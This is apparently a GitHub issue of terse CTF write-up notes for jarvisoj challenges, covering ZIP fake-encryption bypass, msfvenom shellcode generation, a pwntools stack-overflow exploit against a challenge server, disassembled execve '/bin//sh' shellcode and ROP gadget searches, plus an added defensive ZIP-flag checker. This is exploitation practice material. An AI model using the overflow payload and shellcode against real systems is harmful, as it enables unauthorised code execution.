zhouat / ctf


wp for https://www.jarvisoj.com/challenges #3

Open zhouat opened 7 years ago

zhouat commented 7 years ago
  1. APK fake encryption (伪加密) https://github.com/zhouat/DalvikBytecodeTampering/blob/master/unpack.py
    from zipfile import ZipFile, ZipInfo

    zip_file = "word.zip"
    zip_entry = "word.docx"
    zip_instance = ZipFile(zip_file)
    zip_info = zip_instance.getinfo(zip_entry)
    # bit 0 of the general-purpose flag marks the entry as encrypted; the archive
    # only pretends to be encrypted, so clear that bit on the in-memory ZipInfo
    zip_info.flag_bits ^= zip_info.flag_bits % 2
    ZipFile.extract(zip_instance, zip_info)
  2. shellcode https://www.offensive-security.com/metasploit-unleashed/msfvenom/ https://www.offensive-security.com/metasploit-unleashed/alphanumeric-shellcode/ shellcodeexec
    msfvenom -a x86 --platform windows -p windows/messagebox TEXT="F**K U" -e x86/alpha_mixed -t raw BufferRegister=EAX

pwntool socket

from pwn import *

context.log_level = 'debug'
conn = remote('pwn.jarvisoj.com', 9876)
print(conn.readline())
# 0x88 bytes of padding up to the saved return address, then 0x400620 little-endian
conn.send(b'a' * 0x88 + b'\x20\x06\x40\x00\x00\x00\x00\x00')
print(conn.recvrepeat())

pop shell

In [23]: print disasm('\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80')
   0:   31 c0                   xor    eax,eax
   2:   50                      push   eax
   3:   68 2f 2f 73 68          push   0x68732f2f
   8:   68 2f 62 69 6e          push   0x6e69622f
   d:   89 e3                   mov    ebx,esp
   f:   50                      push   eax
  10:   53                      push   ebx
  11:   89 e1                   mov    ecx,esp
  13:   31 d2                   xor    edx,edx
  15:   b0 0b                   mov    al,0xb
  17:   cd 80                   int    0x80

Tools: JPK (JPocketKnife); Stegsolve; asm(arch='arm'); sudo apt-get install gcc-arm-linux-gnueabihf
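
The unpack.py trick from item 1, generalized into a check an analyst can run on a suspect ZIP or APK (added example, not code from the writeup or from unpack.py; the sample archive, its contents and the entry name secret.bin are constructed for the demo). An entry whose encrypted bit is merely forged reads back with a good CRC-32 once the bit is cleared in memory, while a genuinely encrypted (or corrupt) entry fails that read, so the two cases are told apart instead of blindly unpacking.

```python
import io
import zipfile
import zlib

ENCRYPTED = 0x1  # bit 0 of the ZIP general-purpose flag: "this entry is encrypted"


def recover(data: bytes) -> dict:
    """For each entry carrying the encrypted bit, clear it on the in-memory ZipInfo
    (the unpack.py trick) and read the entry; zipfile verifies the CRC-32, so
    forged-flag plaintext comes back as bytes and real ciphertext maps to None."""
    result = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if not info.flag_bits & ENCRYPTED:
                continue
            info.flag_bits &= ~ENCRYPTED
            try:
                result[info.filename] = zf.read(info)
            except (zipfile.BadZipFile, zlib.error):
                result[info.filename] = None
    return result


def _header(raw: bytes, sig: bytes, name_off: int, name: bytes) -> int:
    """Offset of the local (PK\\x03\\x04) or central (PK\\x01\\x02) header naming `name`."""
    pos = raw.find(sig)
    while pos != -1 and raw[pos + name_off:pos + name_off + len(name)] != name:
        pos = raw.find(sig, pos + 1)
    if pos == -1:
        raise ValueError(f"no {sig!r} header for {name!r}")
    return pos


def build_sample() -> bytes:
    """Constructed archive (not from the writeup): word.docx is plaintext with the bit
    forged in both headers; secret.bin gets the bit and scrambled bytes (fake ciphertext)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr("word.docx", b"hello from inside the docx")
        zf.writestr("secret.bin", b"this one is truly encrypted")
    raw = bytearray(buf.getvalue())
    for name in (b"word.docx", b"secret.bin"):
        raw[_header(raw, b"PK\x03\x04", 30, name) + 6] |= ENCRYPTED  # local header flags
        raw[_header(raw, b"PK\x01\x02", 46, name) + 8] |= ENCRYPTED  # central directory flags
    body = _header(raw, b"PK\x03\x04", 30, b"secret.bin") + 30 + len(b"secret.bin")
    for i in range(body, body + len(b"this one is truly encrypted")):
        raw[i] ^= 0x5A  # stored bytes no longer match the CRC-32 in the central directory
    return bytes(raw)
```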

zhouat commented 7 years ago

ropper -f level2_x64 --search "pop|edi|ret"

L2R [1] edi [2] esi [3] rdx [4] rcx [5] r8 [6] r9

R2L [7]...

zhouat commented 7 years ago

ROPgadget --binary pwn2 --ropchain

p32(0x080483e4).encode('hex').decode('hex')

ref: https://github.com/CTF-Thanos/ctf-writeups/tree/master/2016/429ctf/pwn/pwn2